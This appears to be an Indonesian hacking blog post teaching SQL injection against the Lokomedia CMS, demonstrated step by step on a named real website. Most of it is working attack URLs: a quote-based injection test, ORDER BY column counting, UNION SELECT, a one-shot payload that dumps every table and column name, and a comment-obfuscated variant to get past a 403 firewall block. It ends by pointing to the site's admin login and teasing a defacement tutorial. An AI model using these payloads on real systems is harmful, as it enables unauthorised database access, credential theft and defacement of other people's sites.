sql injection cms lokomedia And bypass forbidden 403
[+]Author : . ./Snopunks
[+]Google Dork : klick disini
[+]download txt nya : klick disini
[+]Proof of Concept : First, you must find out whether the site has vulnerability to SQL injection and if you enter a string there is an error or a damaged / missing image. Errors Occur then that is vuln.
bertemu lagi di blog sederhana ini ea
kali ini w mau kasih tau cara sqli di cms lokomedia ea
ni gw uda dapet target :
tinggal taruh string nya contoh :
http://www.kagemjogja.org/hal-visi-misi'.html
nah kan pas di kasih string hilang gambar yang di sebelah kiri
liat kira,kiri woi bukan kanan
tu liat gambarnya liat apa perbedaanya
sekarang tinggal order by blalala
ni w nemu errornya di angka 20, dan normal 19
tinggal union select buat nyari angka togelnya ea
contoh : 1.http://www.kagemjogja.org/hal-visi-misi'+order+by+19--+.html
2.http://www.kagemjogja.org/hal-visi-misi'union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-.html
lah kok gak kluar nomer ?
tenang tinggal tambahin 'and+0+
contoh : http://www.kagemjogja.org/hal-visi-misi'and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-.html
nah keluar kan angka togelnya :v
sekarang tinggal tempel dios di angka togel
tadi:
contoh : http://www.kagemjogja.org/hal-visi-misi'and%200+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-.html
yah 403 forbidden aksi kita dilarang gan
tinggal bypass aja ea
ganti dios tadi dengan dios ini :
/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)
ga ngerti ?
ni liat contohnya :
http://www.kagemjogja.org/hal-visi-misi'and%200+union+select+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-.html
nah kan ga forbidden lagi ea
tinggal kita cari username ama password nya
tempet login : http://www.kagemjogja.org/login/
ea
oke segini aja semoga mudah di dipahami >_<
terima kasih telah berkunjung di blog sederhana ini >_<
Next Tutorial Deface SQL balitbang news dios
BalasHapusBuat ngedump username and password Gimana?
BalasHapus